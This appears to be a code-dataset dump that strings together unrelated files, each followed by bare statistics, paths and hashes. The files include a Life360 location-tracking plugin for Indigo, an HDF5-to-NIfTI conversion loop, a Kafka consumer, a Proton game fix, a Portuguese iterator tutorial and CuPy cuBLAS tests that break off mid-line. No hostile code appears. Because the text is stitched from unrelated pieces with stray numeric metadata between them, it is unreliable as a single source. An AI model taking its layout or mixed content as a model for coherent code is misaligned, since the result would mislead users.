def deviceStopComm(self, device): self.logger.debug("Stopping device: " + device.name) if device.id in self.deviceList: self.deviceList.remove(device.id) ######################################## def runConcurrentThread(self): self.logger.debug("Starting concurrent thread") try: pollingFreq = int(self.pluginPrefs['refresh_frequency']) * 1 except: pollingFreq = 60 self.logger.debug("Current polling frequency is: " + str(pollingFreq) + " seconds") # Refresh device states immediately after restarting the Plugin iterationcount = 1 try: while True: if (iterationcount > 1): self.sleep(1 * pollingFreq) self.get_new_life360json() iterationcount += 1 for deviceId in self.deviceList: # call the update method with the device instance self.update(indigo.devices[deviceId]) self.updatedevicestates(indigo.devices[deviceId]) except self.StopThread: pass ######################################## def update(self, device): #self.logger.debug(device.name) # # device.stateListOrDisplayStateIdChanged() return ######################################## # UI Validate, Device Config ######################################## def validateDeviceConfigUi(self, valuesDict, typeId, device): return (True, valuesDict) # assigns the device.address to the value of the member.id def menuChanged(self, valuesDict = None, typeId = None, devId = None): self.create_member_list() self.logger.debug(self.member_list) if valuesDict['membername'] in self.member_list: tempName = valuesDict['membername'] valuesDict['address'] = self.member_list[tempName] # m['id'] else: valuesDict['address'] = "Unknown" return valuesDict #dump JSON to event log def write_json_to_log(self): if (len(self.life360data) == 0): self.get_new_life360json() self.logger.debug(self.life360data) if (not self.debug): indigo.server.log("Life360 data has been written to the debugLog. If you did not see it you may need to enable debugging in the Plugin Config UI") return ######################################## # UI Validate, Plugin Preferences ######################################## def validatePrefsConfigUi(self, valuesDict): if int(valuesDict['refresh_frequency']) < 15: self.logger.error("Invalid entry for Refresh Frequency - must be greater than 15") errorsDict = indigo.Dict() errorsDict['refresh_frequency'] = "Invalid entry for Refresh Frequency - must be greater than 15" return (False, valuesDict, errorsDict) if (not valuesDict['life360_username']): self.logger.error("Invalid entry for Life360 username - cannot be empty") errorsDict = indigo.Dict() errorsDict['life360_username'] = "Invalid entry for Life360 username - cannot be empty" return (False, valuesDict, errorsDict) if (valuesDict['life360_username'].find('@') == -1): self.logger.error("Invalid entry for Life360 username - must be a valid email address") errorsDict = indigo.Dict() errorsDict['life360_username'] = "Invalid entry for Life360 username - must be a valid email address" return (False, valuesDict, errorsDict) if (valuesDict['life360_username'].find('.') == -1): self.logger.error("Invalid entry for Life360 username - must be a valid email address") errorsDict = indigo.Dict() errorsDict['life360_username'] = "Invalid entry for Life360 username - must be a valid email address" return (False, valuesDict, errorsDict) if (not valuesDict['life360_password']): self.logger.error("Invalid entry for Life360 password - cannot be empty") errorsDict = indigo.Dict() errorsDict['life360_password'] = "Invalid entry for Life360 password - cannot be empty" return (False, valuesDict, errorsDict) auth_result = self.validate_api_auth(valuesDict['life360_username'], valuesDict['life360_password'], valuesDict['authorizationtoken']) if (not auth_result): self.logger.error("Life360 API Authentication failed - check your username and password") errorsDict = indigo.Dict() errorsDict['life360_password'] = "Life360 API Authentication failed - check your username and password" return (False, valuesDict, errorsDict) self.debug = valuesDict['showDebugInfo'] self.logger.debug("Debug set to: " + str(self.debug)) return (True, valuesDict) def validate_api_auth(self, username, password, authorization_token): api = life360(authorization_token=authorization_token, username=username, password=password) try: if api.authenticate(): self.logger.debug("Validation of API was successful") return True else: self.logger.debug("Validation of API FAILED") return False except Exception as e: self.logger.debug("Error authenticating: " + e.msg) return False def get_member_list(self, filter="", valuesDict=None, typeId="", targetId=0): if (len(self.member_list) == 0): self.create_member_list() retList = list(self.member_list.keys()) return retList def get_new_life360json(self): api = life360(authorization_token=self.authorization_token, username=self.username, password=self.password) if api.authenticate(): try: self.logger.debug("Attepting to get list of circles") circles = api.get_circles() id = circles[0]['id'] circle = api.get_circle(id) self.life360data = circle self.create_member_list() except Exception as e: self.logger.error(e.message) else: self.logger.error("Error retrieving new Life360 JSON, Make sure you have the correct credentials in Plugin Config") return def create_member_list(self): if len(self.life360data) == 0: self.get_new_life360json() self.member_list.clear() for m in self.life360data['members']: self.member_list[m['firstName']] = m['id'] return def toggleDebugging(self): if self.debug: self.debug = False self.logger.info(u"Turning off debug logging (Toggle Debugging menu item chosen).") self.pluginPrefs['showDebugInfo'] = False else: self.debug = True self.pluginPrefs['showDebugInfo'] = True self.logger.debug(u"Turning on debug logging (Toggle Debugging menu item chosen).") ############################ # Action Method ############################# def refresh_member_data(self,pluginAction, device): self.get_new_life360json() self.updatedevicestates(device) return def isDriving(self, speed_int): if (round(speed_int) > 1): return 1 else: return 0 def mphSpeed(self, speed_int): if speed_int < 2: return str(speed_int) else: return str(round(2.2 * speed_int)) def updatedevicestates(self, device): device_states = [] member_device = device.pluginProps['membername'] member_device_address = device.address self.logger.debug("Updating device: " + member_device) try: geocoder = Nominatim(user_agent='life360') except: self.logger.error("Error instantiating geocoder object") pass if self.life360data['members']: for m in self.life360data['members']: if ((m['id'] == member_device_address) and (m['location'])): x = datetime.datetime.now() cur_date_time = x.strftime("%m/%d/%Y %I:%M %p") # the raw speed from Life360 is exstimated to be MPH/2.2 adjustedSpeed = self.mphSpeed(float(m['location']['speed'])) # the raw Life360 isDriving boolean always comes back 0. Let's use speed to determine isDriving for Indigo adjustedDriving = self.isDriving(float(adjustedSpeed)) device_states.append({'key': 'member_id','value': m['id'] }) device_states.append({'key': 'member_avatar','value': m['avatar'] }) device_states.append({'key': 'member_first_name','value': m['firstName'] }) device_states.append({'key': 'member_last_name','value': m['lastName'] }) device_states.append({'key': 'member_phone_num','value': m['loginPhone']}) device_states.append({'key': 'member_email','value': m['loginEmail']}) device_states.append({'key': 'last_api_update','value': str(cur_date_time)}) device_states.append({'key': 'member_360_location','value': m['location']['name']}) device_states.append({'key': 'member_battery','value': m['location']['battery']}) device_states.append({'key': 'batteryLevel','value': int(float(m['location']['battery']))}) device_states.append({'key': 'member_wifi','value': m['location']['wifiState']}) device_states.append({'key': 'member_battery_charging','value': m['location']['charge']}) device_states.append({'key': 'member_in_transit','value': m['location']['inTransit']}) device_states.append({'key': 'member_driveSDKStatus','value': m['location']['driveSDKStatus']}) device_states.append({'key': 'member_lat','value': float(m['location']['latitude'])}) device_states.append({'key': 'member_long','value': float(m['location']['longitude'])}) device_states.append({'key': 'member_is_driving','value': adjustedDriving }) device_states.append({'key': 'member_speed','value': adjustedSpeed }) try: # get address from lat long information loclat = float(m['location']['latitude']) loclng = float(m['location']['longitude']) geoloc = geocoder.reverse((loclat, loclng)) currentaddress = geoloc except Exception as g: self.logger.debug(u"Geocoder error") currentaddress = "-geocoder error-" device_states.append({'key': 'member_closest_address','value': str(currentaddress) }) if (m['location']['since']): sincedate = datetime.datetime.fromtimestamp(m['location']['since']) sincedatestr = sincedate.strftime("%m/%d/%Y %I:%M %p") device_states.append({'key': 'member_location_since_datetime','value': sincedatestr}) else: device_states.append({'key': 'member_location_since_datetime','value': ''}) if (m['location']['name'] == "Home"): device.updateStateImageOnServer(indigo.kStateImageSel.MotionSensorTripped) else: device.updateStateImageOnServer(indigo.kStateImageSel.None) device.updateStatesOnServer(device_states) else: pass return
36.931624
174
0.66011
1,493
12,963
5.632954
0.206966
0.045184
0.044946
0.052438
0.314388
0.245898
0.209275
0.174078
0.136385
0.091558
0
0.020093
0.140014
12,963
351
175
36.931624
0.734302
0.056468
0
0.268908
0
0.004202
0.281817
0.019839
0
0
0
0
0
0
null
null
0.058824
0.021008
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
1
0
0
0
0
0
2
ddd0baa5f55beee804fd811c66a9f9297112106b
444
py
Python
snippets/3DEM/useful_bits/scratch_hdf5_2_nii.py
michielkleinnijenhuis/EM
f46a9b11298919b359e80d9f23a7e824df1356cb
[ "Apache-2.0" ]
null
null
null
snippets/3DEM/useful_bits/scratch_hdf5_2_nii.py
michielkleinnijenhuis/EM
f46a9b11298919b359e80d9f23a7e824df1356cb
[ "Apache-2.0" ]
null
null
null
snippets/3DEM/useful_bits/scratch_hdf5_2_nii.py
michielkleinnijenhuis/EM
f46a9b11298919b359e80d9f23a7e824df1356cb
[ "Apache-2.0" ]
null
null
null
### get all the blocked raw datafiles from ARC and convert to nifti's ### #rsync -avz ndcn0180@arcus.arc.ox.ac.uk:/data/ndcn-fmrib-water-brain/ndcn0180/EM/M3/M3_S1_GNU/testblock/m000_?????-?????_?????-?????_?????-?????.h5 /Users/michielk/oxdata/P01/EM/M3/M3_S1_GNU/ for f in `ls m000_?????-?????_?????-?????_?????-?????.h5`; do python $scriptdir/convert/EM_stack2stack.py ${f} ${f/.h5/.nii.gz} -i 'zyx' -l 'xyz' -e -0.0073 -0.0073 0.05 -u done
74
191
0.614865
75
444
3.493333
0.76
0.030534
0.045802
0.061069
0.083969
0
0
0
0
0
0
0.096059
0.085586
444
5
192
88.8
0.549261
0.576577
0
0
0
0
0.033333
0
0
0
0
0
0
0
null
null
0
0
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
ddd71b2e4c6346f49e71518346e30e3f595d4613
1,169
py
Python
lf3py/task/data.py
rog-works/lf3py
e89937f7aa133ed54d85764f06101ab9abf6b960
[ "CNRI-Python" ]
null
null
null
lf3py/task/data.py
rog-works/lf3py
e89937f7aa133ed54d85764f06101ab9abf6b960
[ "CNRI-Python" ]
48
2020-12-19T13:47:26.000Z
2021-01-07T22:27:56.000Z
lf3py/task/data.py
rog-works/lf3py
e89937f7aa133ed54d85764f06101ab9abf6b960
[ "CNRI-Python" ]
null
null
null
from abc import ABCMeta, abstractmethod from dataclasses import dataclass from typing import Any, List, Type, TypeVar from lf3py.lang.dsn import DSN from lf3py.serialization.serializer import DictSerializer, Serializer T_OBJ = TypeVar('T_OBJ') class Command(metaclass=ABCMeta): @property @abstractmethod def dsn(self) -> DSN: raise NotImplementedError() @abstractmethod def data(self, data_type: Type[T_OBJ]) -> T_OBJ: raise NotImplementedError() class CommandQueue: def __init__(self) -> None: self._queue: List[Command] = [] @property def has_next(self) -> bool: return len(self._queue) > 0 def enqueue(self, *commands: Command): self._queue.extend(commands) def __iter__(self) -> 'CommandQueue': return self def __next__(self) -> Command: if not self.has_next: raise StopIteration() task = self._queue[0] self._queue = self._queue[1:] return task @dataclass class Result: _serializer: Serializer = DictSerializer() def serialize(self) -> Any: return self._serializer.serialize(self) Ok = Result()
21.648148
69
0.662104
134
1,169
5.574627
0.380597
0.072289
0.026774
0
0
0
0
0
0
0
0
0.005618
0.238666
1,169
53
70
22.056604
0.833708
0
0
0.166667
0
0
0.014542
0
0
0
0
0
0
1
0.222222
false
0
0.138889
0.083333
0.583333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
dde5915014c5c7fff2dcda09f7e0ecc75334cecc
398
py
Python
downloadHSfiles.py
McDowellLab/downloadNEON
b43d47d40cbf0e168dfa307969687025e3f5fa34
[ "MIT" ]
null
null
null
downloadHSfiles.py
McDowellLab/downloadNEON
b43d47d40cbf0e168dfa307969687025e3f5fa34
[ "MIT" ]
null
null
null
downloadHSfiles.py
McDowellLab/downloadNEON
b43d47d40cbf0e168dfa307969687025e3f5fa34
[ "MIT" ]
null
null
null
from hs_restclient import HydroShare, HydroShareAuthBasic # Download LCZO sesnor database from Hydroshare # link to the Hydroshare resource https://www.hydroshare.org/resource/b38bc00887ec45ac9499f9dea45eb8d5/ auth = HydroShareAuthBasic(username="miguelcleon", password = "x") hs = HydroShare(auth = auth) hs.getResource('b38bc00887ec45ac9499f9dea45eb8d5', destination='./lczodata', unzip=True)
39.8
103
0.81407
40
398
8.075
0.7
0
0
0
0
0
0
0
0
0
0
0.099448
0.090452
398
9
104
44.222222
0.792818
0.369347
0
0
0
0
0.218623
0.129555
0
0
0
0
0
1
0
false
0.25
0.25
0
0.25
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
dde641d979074c8c01c9f5c1fbef8f55228ae8fe
339
py
Python
protonfixes/gamefixes/287260.py
bmaupin/protonfixes
9fc87a9a487d7dfbd0c602a079f3b026f8a84638
[ "BSD-2-Clause" ]
213
2018-10-06T01:40:26.000Z
2022-03-16T16:17:37.000Z
protonfixes/gamefixes/287260.py
bmaupin/protonfixes
9fc87a9a487d7dfbd0c602a079f3b026f8a84638
[ "BSD-2-Clause" ]
88
2018-10-06T17:38:56.000Z
2022-02-19T13:27:26.000Z
protonfixes/gamefixes/287260.py
bmaupin/protonfixes
9fc87a9a487d7dfbd0c602a079f3b026f8a84638
[ "BSD-2-Clause" ]
67
2018-10-09T16:57:16.000Z
2022-03-14T13:06:25.000Z
""" Game fix for Toybox Turbos """ #pylint: disable=C0103 from protonfixes import util from protonfixes.logger import log def main(): """ Changes the proton argument from the launcher to the game """ log('Applying fixes for Toybox Turbos') # Fix infinite startup screen util.set_environment('PROTON_NO_ESYNC', '1')
21.1875
65
0.707965
46
339
5.152174
0.695652
0.075949
0.126582
0
0
0
0
0
0
0
0
0.018382
0.19764
339
15
66
22.6
0.852941
0.41003
0
0
0
0
0.259459
0
0
0
0
0
0
1
0.2
true
0
0.4
0
0.6
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
2
ddea0dbcc4c809d7b5a35e5b2781bf028ff2f764
140
py
Python
tests/framework/Optimizers/Infinite/infinite.py
milljm/raven
5f29fe81b75e2ffbeb54a55aa63647e7b2f6457b
[ "Apache-2.0" ]
2
2019-10-11T15:59:10.000Z
2021-04-08T18:23:57.000Z
tests/framework/Optimizers/Infinite/infinite.py
milljm/raven
5f29fe81b75e2ffbeb54a55aa63647e7b2f6457b
[ "Apache-2.0" ]
1
2018-03-27T13:06:00.000Z
2018-03-27T13:06:00.000Z
tests/framework/Optimizers/Infinite/infinite.py
milljm/raven
5f29fe81b75e2ffbeb54a55aa63647e7b2f6457b
[ "Apache-2.0" ]
1
2017-08-29T16:09:13.000Z
2017-08-29T16:09:13.000Z
import numpy as np def run(self,Inputs): if self.x != 0.0: self.ans = self.y/self.x else: self.ans = np.array([float('inf')])
15.555556
39
0.592857
26
140
3.192308
0.653846
0.120482
0
0
0
0
0
0
0
0
0
0.018349
0.221429
140
8
40
17.5
0.743119
0
0
0
0
0
0.021583
0
0
0
0
0
0
1
0.166667
false
0
0.166667
0
0.333333
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
ddf357f8f64530a6e0a779ab33c258cb0322ac3e
189
py
Python
kafka/1/consumer/kaktatest.py
adriancarriger/experiments
7e4248592dc8fbb08522c9b5f0393c80dc7e2699
[ "MIT" ]
1
2021-06-22T13:38:36.000Z
2021-06-22T13:38:36.000Z
kafka/1/consumer/kaktatest.py
adriancarriger/experiments
7e4248592dc8fbb08522c9b5f0393c80dc7e2699
[ "MIT" ]
108
2019-05-23T16:12:32.000Z
2020-09-04T15:47:33.000Z
kafka/1/consumer/kaktatest.py
adriancarriger/experiments
7e4248592dc8fbb08522c9b5f0393c80dc7e2699
[ "MIT" ]
null
null
null
from kafka import KafkaConsumer consumer = KafkaConsumer('myTestTopic', bootstrap_servers='localhost:9092') for item in consumer: print("The Message is :", item) # https://kafka-1:9092
31.5
75
0.756614
24
189
5.916667
0.791667
0
0
0
0
0
0
0
0
0
0
0.054217
0.121693
189
5
76
37.8
0.801205
0.10582
0
0
0
0
0.245509
0
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0.25
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
fb07d1f256a2f6d7a6cc9dbdf801ef7f4558d52a
323
py
Python
TP_ALGO_3/convert.py
PierreLeGuen/ALGO_S5
9067e887d14fe997c6944292a0cff23ceda47b6e
[ "MIT" ]
null
null
null
TP_ALGO_3/convert.py
PierreLeGuen/ALGO_S5
9067e887d14fe997c6944292a0cff23ceda47b6e
[ "MIT" ]
null
null
null
TP_ALGO_3/convert.py
PierreLeGuen/ALGO_S5
9067e887d14fe997c6944292a0cff23ceda47b6e
[ "MIT" ]
null
null
null
def convert(n,base): if n < base: res = str(n) else: res = convert(n//base,base) + str(n%base) return res print(convert(10,2)) def convert_inv(n,base): if n < base: res = str(n) else: res = str(n%base) + convert(n//base,base) return res print(convert_inv(10,2))
16.15
49
0.544892
52
323
3.346154
0.25
0.229885
0.206897
0.091954
0.586207
0.298851
0.298851
0.298851
0.298851
0.298851
0
0.026549
0.30031
323
19
50
17
0.743363
0
0
0.571429
0
0
0
0
0
0
0
0
0
1
0.142857
false
0
0
0
0.285714
0.142857
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
fb0b24730ac65daad4c5e515482703fc512b4066
300
py
Python
output/models/nist_data/list_pkg/non_positive_integer/schema_instance/nistschema_sv_iv_list_non_positive_integer_length_1_xsd/__init__.py
tefra/xsdata-w3c-tests
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
[ "MIT" ]
1
2021-08-14T17:59:21.000Z
2021-08-14T17:59:21.000Z
output/models/nist_data/list_pkg/non_positive_integer/schema_instance/nistschema_sv_iv_list_non_positive_integer_length_1_xsd/__init__.py
tefra/xsdata-w3c-tests
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
[ "MIT" ]
4
2020-02-12T21:30:44.000Z
2020-04-15T20:06:46.000Z
output/models/nist_data/list_pkg/non_positive_integer/schema_instance/nistschema_sv_iv_list_non_positive_integer_length_1_xsd/__init__.py
tefra/xsdata-w3c-tests
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
[ "MIT" ]
null
null
null
from output.models.nist_data.list_pkg.non_positive_integer.schema_instance.nistschema_sv_iv_list_non_positive_integer_length_1_xsd.nistschema_sv_iv_list_non_positive_integer_length_1 import NistschemaSvIvListNonPositiveIntegerLength1 __all__ = [ "NistschemaSvIvListNonPositiveIntegerLength1", ]
50
233
0.91
35
300
7.057143
0.6
0.133603
0.218623
0.145749
0.348178
0.348178
0.348178
0.348178
0.348178
0
0
0.013986
0.046667
300
5
234
60
0.84965
0
0
0
0
0
0.143333
0.143333
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
fb1aa25d697063ac5234b37a20af2edde89cf7c2
825
py
Python
2 - python intermediario/63 - iteraveis/64 - comportamento iteradores e geradores.py
AdrianaViabL/Curso-Python-udemy
a4f230354985d0f6026a1e7b4913a8f64e205654
[ "Apache-2.0" ]
null
null
null
2 - python intermediario/63 - iteraveis/64 - comportamento iteradores e geradores.py
AdrianaViabL/Curso-Python-udemy
a4f230354985d0f6026a1e7b4913a8f64e205654
[ "Apache-2.0" ]
null
null
null
2 - python intermediario/63 - iteraveis/64 - comportamento iteradores e geradores.py
AdrianaViabL/Curso-Python-udemy
a4f230354985d0f6026a1e7b4913a8f64e205654
[ "Apache-2.0" ]
null
null
null
#lists, tuplas, strings -> sequencias -> iteraveis nome = 'nome qualquer' print('comportamento esperado de um valor iteravel') print('o valor vai sempre estar la para ser exibido novamente') for l in nome: print(l) print(nome) print(10 * '=====') iterador = iter(nome) try: # quando mostrado x valor de um iterador, o valor nao existe mais nessa variavel print(next(iterador)) # n print(next(iterador)) # o print(next(iterador)) # m print(next(iterador)) # e print(next(iterador)) except: pass print('CADE OS VALORES???') for i in iterador: print(i) print('\ntrabalhando com gerador\n') gerador = (letra for letra in nome) print(next(gerador)) print(next(gerador)) print(next(gerador)) print(next(gerador)) print(next(gerador)) print(10 * '======') for i in gerador: print(i)
21.153846
86
0.676364
119
825
4.689076
0.436975
0.16129
0.15233
0.188172
0.15233
0.15233
0.15233
0.15233
0.15233
0.15233
0
0.005926
0.181818
825
38
87
21.710526
0.820741
0.164848
0
0.413793
0
0
0.243045
0
0
0
0
0
0
1
0
false
0.034483
0
0
0
0.689655
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
2
fb32689f50782a5ff37cf378f6a450894a0dc23f
22,922
py
Python
tests/cupy_tests/test_cublas.py
Onkar627/cupy
8eef1ad5393c0a92c5065bc05137bf997f37044a
[ "MIT" ]
1
2022-01-12T22:57:54.000Z
2022-01-12T22:57:54.000Z
tests/cupy_tests/test_cublas.py
Onkar627/cupy
8eef1ad5393c0a92c5065bc05137bf997f37044a
[ "MIT" ]
null
null
null
tests/cupy_tests/test_cublas.py
Onkar627/cupy
8eef1ad5393c0a92c5065bc05137bf997f37044a
[ "MIT" ]
1
2022-03-21T20:19:12.000Z
2022-03-21T20:19:12.000Z
import numpy import pytest import cupy from cupy import cublas from cupy import testing from cupy.testing import _attr @testing.parameterize(*testing.product({ 'dtype': ['float32', 'float64', 'complex64', 'complex128'], 'n': [10, 33, 100], 'bs': [None, 1, 10], 'nrhs': [None, 1, 10], })) @_attr.gpu class TestBatchedGesv: _tol = {'f': 5e-5, 'd': 1e-12} def _make_random_matrices(self, shape, xp): a = testing.shaped_random(shape, xp, dtype=self.r_dtype, scale=1) if self.dtype.char in 'FD': a = a + 1j * testing.shaped_random(shape, xp, dtype=self.r_dtype, scale=1) return a def _make_well_conditioned_matrices(self, shape): a = self._make_random_matrices(shape, numpy) u, s, vh = numpy.linalg.svd(a) s = testing.shaped_random(s.shape, numpy, dtype=self.r_dtype, scale=1) + 1 a = numpy.einsum('...ik,...k,...kj->...ij', u, s, vh) return cupy.array(a) @pytest.fixture(autouse=True) def setUp(self): self.dtype = numpy.dtype(self.dtype) if self.dtype.char in 'fF': self.r_dtype = numpy.float32 else: self.r_dtype = numpy.float64 n = self.n bs = 1 if self.bs is None else self.bs nrhs = 1 if self.nrhs is None else self.nrhs a = self._make_well_conditioned_matrices((bs, n, n)) x = self._make_random_matrices((bs, n, nrhs), cupy) b = cupy.matmul(a, x) a_shape = (n, n) if self.bs is None else (bs, n, n) b_shape = [n] if self.bs is not None: b_shape.insert(0, bs) if self.nrhs is not None: b_shape.append(nrhs) self.a = a.reshape(a_shape) self.b = b.reshape(b_shape) self.x_ref = x.reshape(b_shape) if self.r_dtype == numpy.float32: self.tol = self._tol['f'] elif self.r_dtype == numpy.float64: self.tol = self._tol['d'] def test_batched_gesv(self): x = cublas.batched_gesv(self.a, self.b) cupy.testing.assert_allclose(x, self.x_ref, rtol=self.tol, atol=self.tol) @testing.parameterize(*testing.product({ 'dtype': ['float32', 'float64', 'complex64', 'complex128'], 'n': [10, 100], 'mode': [None, numpy, cupy], })) @_attr.gpu class TestLevel1Functions: _tol = {'f': 1e-5, 'd': 1e-12} @pytest.fixture(autouse=True) def setUp(self): self.dtype = numpy.dtype(self.dtype) self.tol = self._tol[self.dtype.char.lower()] def _make_random_vector(self): return testing.shaped_random((self.n,), cupy, dtype=self.dtype) def _make_out(self, dtype): out = None if self.mode is not None: out = self.mode.empty([], dtype=dtype) return out def _check_pointer(self, a, b): if a is not None and b is not None: assert self._get_pointer(a) == self._get_pointer(b) def _get_pointer(self, a): if isinstance(a, cupy.ndarray): return a.data.ptr else: return a.ctypes.data def test_iamax(self): x = self._make_random_vector() ref = cupy.argmax(cupy.absolute(x.real) + cupy.absolute(x.imag)) out = self._make_out('i') res = cublas.iamax(x, out=out) self._check_pointer(res, out) # Note: iamax returns 1-based index cupy.testing.assert_array_equal(res - 1, ref) def test_iamin(self): x = self._make_random_vector() ref = cupy.argmin(cupy.absolute(x.real) + cupy.absolute(x.imag)) out = self._make_out('i') res = cublas.iamin(x, out=out) self._check_pointer(res, out) # Note: iamin returns 1-based index cupy.testing.assert_array_equal(res - 1, ref) def test_asum(self): x = self._make_random_vector() ref = cupy.sum(cupy.absolute(x.real) + cupy.absolute(x.imag)) out = self._make_out(self.dtype.char.lower()) res = cublas.asum(x, out=out) self._check_pointer(res, out) cupy.testing.assert_allclose(res, ref, rtol=self.tol, atol=self.tol) def test_axpy(self): x = self._make_random_vector() y = self._make_random_vector() a = 1.1 if self.dtype.char in 'FD': a = a - 1j * 0.9 ref = a * x + y if self.mode is not None: a = self.mode.array(a, dtype=self.dtype) cublas.axpy(a, x, y) cupy.testing.assert_allclose(y, ref, rtol=self.tol, atol=self.tol) def test_dot(self): x = self._make_random_vector() y = self._make_random_vector() ref = x.dot(y) out = self._make_out(self.dtype) if self.dtype.char in 'FD': with pytest.raises(TypeError): res = cublas.dot(x, y, out=out) return res = cublas.dot(x, y, out=out) self._check_pointer(res, out) cupy.testing.assert_allclose(res, ref, rtol=self.tol, atol=self.tol) def test_dotu(self): x = self._make_random_vector() y = self._make_random_vector() ref = x.dot(y) out = self._make_out(self.dtype) res = cublas.dotu(x, y, out=out) self._check_pointer(res, out) cupy.testing.assert_allclose(res, ref, rtol=self.tol, atol=self.tol) def test_dotc(self): x = self._make_random_vector() y = self._make_random_vector() ref = x.conj().dot(y) out = self._make_out(self.dtype) res = cublas.dotc(x, y, out=out) self._check_pointer(res, out) cupy.testing.assert_allclose(res, ref, rtol=self.tol, atol=self.tol) def test_nrm2(self): x = self._make_random_vector() ref = cupy.linalg.norm(x) out = self._make_out(self.dtype.char.lower()) res = cublas.nrm2(x, out=out) self._check_pointer(res, out) cupy.testing.assert_allclose(res, ref, rtol=self.tol, atol=self.tol) def test_scal(self): x = self._make_random_vector() a = 1.1 if self.dtype.char in 'FD': a = a - 1j * 0.9 ref = a * x if self.mode is not None: a = self.mode.array(a, dtype=self.dtype) cublas.scal(a, x) cupy.testing.assert_allclose(x, ref, rtol=self.tol, atol=self.tol) @testing.parameterize(*testing.product({ 'dtype': ['float32', 'float64', 'complex64', 'complex128'], 'shape': [(10, 9), (9, 10)], 'trans': ['N', 'T', 'H'], 'order': ['C', 'F'], 'mode': [None, numpy, cupy], })) @_attr.gpu class TestGemv: _tol = {'f': 1e-5, 'd': 1e-12} @pytest.fixture(autouse=True) def setUp(self): self.dtype = numpy.dtype(self.dtype) self.tol = self._tol[self.dtype.char.lower()] def test_gemv(self): a = testing.shaped_random(self.shape, cupy, dtype=self.dtype, order=self.order) if self.trans == 'N': ylen, xlen = self.shape else: xlen, ylen = self.shape x = testing.shaped_random((xlen,), cupy, dtype=self.dtype) y = testing.shaped_random((ylen,), cupy, dtype=self.dtype) alpha = 0.9 beta = 0.8 if self.dtype.char in 'FD': alpha = alpha - 1j * 0.7 beta = beta - 1j * 0.6 if self.trans == 'N': ref = alpha * a.dot(x) + beta * y elif self.trans == 'T': ref = alpha * a.T.dot(x) + beta * y elif self.trans == 'H': ref = alpha * a.T.conj().dot(x) + beta * y if self.mode is not None: alpha = self.mode.array(alpha) beta = self.mode.array(beta) cupy.cublas.gemv(self.trans, alpha, a, x, beta, y) cupy.testing.assert_allclose(y, ref, rtol=self.tol, atol=self.tol) @testing.parameterize(*testing.product({ 'rank': [5, 9], 'band': [0, 1, 3], 'lower': [0, 1], 'order': ['C', 'F'], 'mode': [None, numpy, cupy], })) @_attr.gpu class TestSbmv: _tol = {'f': 1e-5, 'd': 1e-12} def _gen2band(self, A, ku=0, kl=0, order='C'): assert A.ndim == 2 n, m = A.shape ldm, lda = n, 1 + ku + kl B = numpy.zeros((lda, ldm), dtype=A.dtype, order=order) for j in range(n): k = ku - j for i in range(max(0, j-ku), min(m, j + kl + 1)): B[(k + i), j] = A[i, j] return B @testing.for_dtypes('fd') def test_sbmv(self, dtype): dtype = numpy.dtype(dtype) alpha, beta = 3.0, 2.0 n, k = self.rank, self.band a = numpy.eye(n, n, 0, dtype, self.order) a *= numpy.random.randint(20) for i in range(1, k+1): band = numpy.random.randint(20, size=n-i) a += numpy.diag(band, k=+i) a += numpy.diag(band, k=-i) x = numpy.random.randint(20, size=n).astype(a.dtype) y = numpy.random.randint(20, size=n).astype(a.dtype) ku, kl = k, 0 if self.lower == 1: ku, kl = kl, ku b = self._gen2band(a, ku, kl) a, b = cupy.asarray(a), cupy.asarray(b) x, y = cupy.asarray(x), cupy.asarray(y) ref = alpha * a.dot(x) + beta * y if self.mode is not None: alpha = self.mode.array(alpha) beta = self.mode.array(beta) y_ret = cupy.cublas.sbmv(k, alpha, b, x, beta, y, lower=self.lower) tol = self._tol[dtype.char.lower()] cupy.testing.assert_allclose(y, ref, rtol=tol, atol=tol) cupy.testing.assert_allclose(y_ret, ref, rtol=tol, atol=tol) @testing.parameterize(*testing.product({ 'dtype': ['float32', 'float64', 'complex64', 'complex128'], 'shape': [(10, 9), (9, 10)], 'order': ['C', 'F'], 'mode': [None, numpy, cupy], })) @_attr.gpu class TestGer: _tol = {'f': 1e-5, 'd': 1e-12} @pytest.fixture(autouse=True) def setUp(self): self.dtype = numpy.dtype(self.dtype) self.tol = self._tol[self.dtype.char.lower()] self.a = testing.shaped_random(self.shape, cupy, dtype=self.dtype, order=self.order) self.x = testing.shaped_random((self.shape[0],), cupy, dtype=self.dtype) self.y = testing.shaped_random((self.shape[1],), cupy, dtype=self.dtype) self.alpha = 1.1 if self.dtype.char in 'FD': self.alpha = self.alpha - 1j * 0.9 def test_ger(self): if self.dtype.char in 'FD': with pytest.raises(TypeError): cublas.ger(self.alpha, self.x, self.y, self.a) return ref = self.alpha * cupy.outer(self.x, self.y) + self.a if self.mode is not None: self.alpha = 